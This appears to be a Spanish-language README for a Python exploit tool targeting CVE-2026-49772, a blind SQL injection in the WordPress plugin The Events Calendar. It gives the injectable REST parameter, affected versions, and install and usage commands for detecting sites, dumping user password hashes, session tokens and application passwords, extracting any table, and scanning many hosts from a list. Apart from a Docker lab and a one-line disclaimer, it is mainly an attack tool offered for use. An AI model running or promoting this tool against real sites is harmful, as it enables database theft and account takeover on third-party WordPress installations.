
Exploit de inyección SQL ciega para CVE-2026-49772 dirigido al plugin The Events Calendar de WordPress. Extrae el contenido de la base de datos mediante oráculo booleano/basado en tiempo con escaneo multihilo, volcado de hashes de usuario y soporte de consultas personalizadas.
CVE-2026-49772 es una inyección SQL ciega no autenticada en el plugin de WordPress The Events Calendar. Un validador de parámetros REST defectuoso (validate_callback devuelve un closure en lugar de validar) permite que el parámetro order en la API REST experimental tec/v1 llegue sin sanitizar a la cláusula SQL ORDER BY:
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...
Esta es una inyección de solo lectura (sin consultas apiladas, sin escrituras, sin salida directa) — pero toda la base de datos se puede extraer mediante un oráculo booleano/basado en tiempo: hashes de contraseñas de usuarios, tokens de sesión, contraseñas de aplicación, claves secretas.
Versiones afectadas: The Events Calendar 6.15.12 – 6.16.2 (corregido en 6.16.3)
Gravedad: CVSS 3.1 9.3 Crítico — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
--check — Detección no intrusiva: espacio de nombres REST, versión del plugin, confirmación basada en tiempo--recon — Huella de la BD: versión, usuario actual, base de datos, SO, privilegios, prefijo de tablas--users — Volcar wp_users: inicios de sesión, correos electrónicos, hashes de contraseñas--user-meta — Volcar wp_usermeta: tokens de sesión, contraseñas de aplicación, capacidades--get-table — Volcar cualquier tabla con descubrimiento automático de columnas--query — Extraer el resultado de cualquier SELECT escalarBiblioteca estándar de Python 3 puro — se incluye requirements.txt para el flujo de trabajo estándar pero no instala nada adicional.
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
python3 CVE-2026-49772.py <target> <action> [options]
Seleccione exactamente una acción: --check, --recon, --users, --user-meta, --get-table <TABLE>, --query <SQL>. Ejecute --help para todas las opciones.
python3 CVE-2026-49772.py target.tld --check
python3 CVE-2026-49772.py target.tld --recon
python3 CVE-2026-49772.py target.tld --users
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
Ajuste: --technique boolean|time, --delay, --threads, --rows, --prefix, --where, -useragent, -timeout. Escanee múltiples hosts con -l targets.txt.
Un laboratorio autocontenido con Docker Compose que incluye el plugin vulnerable (incluido, no descargado al iniciar) y eventos previamente sembrados. Consulte docker/DOCKER.md.
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
/wp-json/tec/v1/ en el WAF / proxy inversoEsta herramienta se proporciona únicamente con fines educativos y de investigación. Úsela solo contra sistemas que posea o para los cuales tenga permiso explícito por escrito para realizar pruebas. El creador no asume ninguna responsabilidad por el mal uso o daño causado por esta herramienta.